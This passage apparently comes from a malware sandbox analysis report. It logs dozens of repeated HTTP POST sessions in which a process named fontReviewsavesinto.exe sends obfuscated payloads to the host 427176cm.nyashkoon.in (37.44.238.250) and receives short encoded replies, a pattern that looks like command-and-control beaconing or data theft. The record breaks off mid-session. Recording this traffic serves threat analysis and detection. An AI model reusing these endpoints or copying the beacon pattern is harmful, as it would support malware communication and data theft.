                                        Data Ascii: [UCX\_ZU^^TUV^ZX_VY^RPR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'!8['=:'#8;(=&<Z3Z4=.*W'$'8+Z*:&G!']*7
                                        Nov 5, 2024 08:13:29.235582113 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:29.313086987 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:27 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        83192.168.2.75005337.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:29.443396091 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:29.802783012 CET1032OUTData Raw: 5b 5e 46 58 59 5e 5a 5c 5e 5e 54 55 56 58 5a 58 5f 51 59 59 52 5a 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [^FXY^Z\^^TUVXZX_QYYRZR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'T0_$.&0?,+Y*%''/<=-"V0-3>?]34>*&G!']*/


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        84192.168.2.75005437.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:29.949323893 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:30.302525043 CET1300OUTData Raw: 5e 59 43 59 5c 58 5a 51 5e 5e 54 55 56 5e 5a 51 5f 55 59 58 52 5c 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^YCY\XZQ^^TUV^ZQ_UYXR\RPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.B'+0-!]'T;-8<>5(['<)0-'7^'<>*&G!']*7
                                        Nov 5, 2024 08:13:30.769572020 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:30.843775034 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:28 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 07 24 5e 23 0d 34 39 3e 55 3c 10 3b 00 21 27 01 59 2f 3d 30 1f 30 23 06 1e 29 01 32 16 21 39 32 59 21 5b 3b 00 34 3d 34 0a 2b 21 2f 5a 07 10 26 03 26 21 37 10 31 58 38 5a 25 20 20 05 29 3c 1a 10 21 02 30 02 31 38 39 5a 31 2a 2f 53 2c 5f 32 0f 39 16 37 5f 2e 08 2c 5e 32 0e 2c 54 0d 10 39 15 3e 08 34 53 3d 3f 25 17 31 51 24 1e 23 3d 3b 10 2a 3a 27 08 28 2e 3a 14 24 1e 28 52 21 22 22 0c 31 02 38 5c 24 57 3f 0f 31 18 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :$^#49>U<;!'Y/=00#)2!92Y![;4=4+!/Z&&!71X8Z% )<!0189Z1*/S,_297_.,^2,T9>4S=?%1Q$#=;*:'(.:$(R!""18\$W?1%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        85192.168.2.75005537.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:30.147300005 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:30.505727053 CET1032OUTData Raw: 5b 5c 43 5c 59 5d 5a 50 5e 5e 54 55 56 5f 5a 5c 5f 55 59 5e 52 58 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [\C\Y]ZP^^TUV_Z\_UY^RXRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.B%",['%]%2<_8;;=5 ^',/X)10?%0=8%(?+:&G!']*3
                                        Nov 5, 2024 08:13:30.967736959 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:31.048032045 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:29 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        86192.168.2.75005637.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:31.180686951 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:31.536737919 CET1032OUTData Raw: 5e 5e 43 5d 59 55 5a 57 5e 5e 54 55 56 5d 5a 5b 5f 56 59 58 52 5c 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^C]YUZW^^TUV]Z[_VYXR\RPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.'<^3'! [-+<=C _$</^>=&U0,%3?'+])*&G!']*
                                        Nov 5, 2024 08:13:32.006922960 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:32.091762066 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:30 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        87192.168.2.75005737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:32.210735083 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:32.567939043 CET1032OUTData Raw: 5b 55 43 5b 5c 59 5f 55 5e 5e 54 55 56 53 5a 5e 5f 54 59 50 52 50 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [UC[\Y_U^^TUVSZ^_TYPRPR[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.3$_$.=3$Z;;$)?$?#==%?&X3+'83Z)*&G!']*
                                        Nov 5, 2024 08:13:33.027956963 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:33.105057001 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:31 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        88192.168.2.75005837.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:33.226041079 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:33.583724976 CET1032OUTData Raw: 5b 5f 43 5c 59 55 5f 51 5e 5e 54 55 56 58 5a 5c 5f 54 59 5d 52 5c 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [_C\YU_Q^^TUVXZ\_TY]R\RPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A$%=)'<Z,<=$$Z=.!'?)$#';[>*&G!']*/
                                        Nov 5, 2024 08:13:34.045192003 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:34.131448030 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:32 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        89192.168.2.75005937.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:34.257230997 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:34.614810944 CET1032OUTData Raw: 5b 54 43 58 5c 5a 5a 5c 5e 5e 54 55 56 5b 5a 5a 5f 51 59 5a 52 5d 52 5c 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [TCX\ZZ\^^TUV[ZZ_QYZR]R\YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.'T3$[&07,( >6('+*&T$%'=7'(X**&G!']*#
                                        Nov 5, 2024 08:13:35.081940889 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:35.161648989 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:33 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        90192.168.2.75006037.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:35.293849945 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:35.646023989 CET1032OUTData Raw: 5b 59 46 5e 59 59 5a 52 5e 5e 54 55 56 5e 5a 58 5f 52 59 58 52 5a 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [YF^YYZR^^TUV^ZX_RYXRZRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.@%20=$1?8'>$'Z;*-20<1$=#$+ =&G!']*7


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        91192.168.2.75006137.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:35.855910063 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:36.208554983 CET1300OUTData Raw: 5b 54 43 5f 59 59 5f 52 5e 5e 54 55 56 59 5a 5f 5f 51 59 5f 52 51 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [TC_YY_R^^TUVYZ__QY_RQRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'2<X3=-_%18/(8^?&$$Z#^)-$X3-338>&G!']*+
                                        Nov 5, 2024 08:13:36.675084114 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:36.751876116 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:34 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 39 58 24 2b 30 55 37 2a 35 0d 2b 58 24 13 23 27 24 02 2c 13 2c 11 24 23 28 1c 3e 06 2d 0b 23 00 36 13 22 03 34 1b 34 00 2b 10 29 0b 2f 5a 07 10 25 5d 26 0c 30 0e 27 2e 05 06 27 0d 23 5e 28 3c 1a 5d 21 28 3b 11 25 2b 2a 03 32 14 34 0e 38 17 21 1f 2d 3b 33 5d 2e 21 09 01 25 1e 2c 54 0d 10 39 1b 2a 22 37 0b 29 02 31 15 32 09 23 0d 23 3e 33 58 3d 3a 02 57 3c 13 26 58 30 0e 2b 0f 35 21 21 54 31 3b 27 05 27 21 01 08 25 22 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: 9X$+0U7*5+X$#'$,,$#(>-#6"44+)/Z%]&0'.'#^(<]!(;%+*248!-;3].!%,T9*"7)12##>3X=:W<&X0+5!!T1;''!%"%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        92192.168.2.75006237.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:35.979125023 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:36.333547115 CET1028OUTData Raw: 5e 59 43 5a 59 5e 5a 50 5e 5e 54 55 56 5a 5a 5d 5f 5a 59 5e 52 58 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^YCZY^ZP^^TUVZZ]_ZY^RXRYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-0!;'-&$"#,8/)(Y$/7^)>.W0<'>8$87Y**&G!']*7
                                        Nov 5, 2024 08:13:36.799299955 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:36.886142015 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:34 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        93192.168.2.75006337.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:37.191095114 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:37.536709070 CET1032OUTData Raw: 5e 5d 43 5d 59 5d 5f 51 5e 5e 54 55 56 5c 5a 5b 5f 54 59 59 52 5e 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]C]Y]_Q^^TUV\Z[_TYYR^R]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.G$$)X'!'83)C?%<?(=%/&_'=;$8+Z>:&G!']*?
                                        Nov 5, 2024 08:13:38.003879070 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:38.075443029 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:36 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        94192.168.2.75006437.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:38.208794117 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:38.568958044 CET1032OUTData Raw: 5b 55 43 5b 59 5e 5f 51 5e 5e 54 55 56 5c 5a 51 5f 5b 59 5b 52 5c 52 5c 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [UC[Y^_Q^^TUV\ZQ_[Y[R\R\YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-38$-0;]0Y>C73??_*.*U3$#^'?Y)&G!']*?
                                        Nov 5, 2024 08:13:39.028203011 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:39.101356030 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:37 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        95192.168.2.75006537.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:39.225403070 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:39.583678961 CET1032OUTData Raw: 5e 59 43 5b 5c 5f 5a 5d 5e 5e 54 55 56 58 5a 5d 5f 50 59 5f 52 51 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^YC[\_Z]^^TUVXZ]_PY_RQRYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.B'! Y$'T<]/+$Z>$Z3 (>1'&37$+4+*&G!']*/
                                        Nov 5, 2024 08:13:40.046519041 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:40.126075983 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:38 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        96192.168.2.75006637.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:40.255975008 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:40.614942074 CET1032OUTData Raw: 5b 5d 43 53 59 55 5a 57 5e 5e 54 55 56 52 5a 5a 5f 51 59 50 52 58 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: []CSYUZW^^TUVRZZ_QYPRXR[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.0!?'9Y3+8 [=%#$,'*..Q0<'-;0+4=:&G!']*
                                        Nov 5, 2024 08:13:41.076498032 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:41.152506113 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:39 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        97192.168.2.75006737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:41.483088970 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
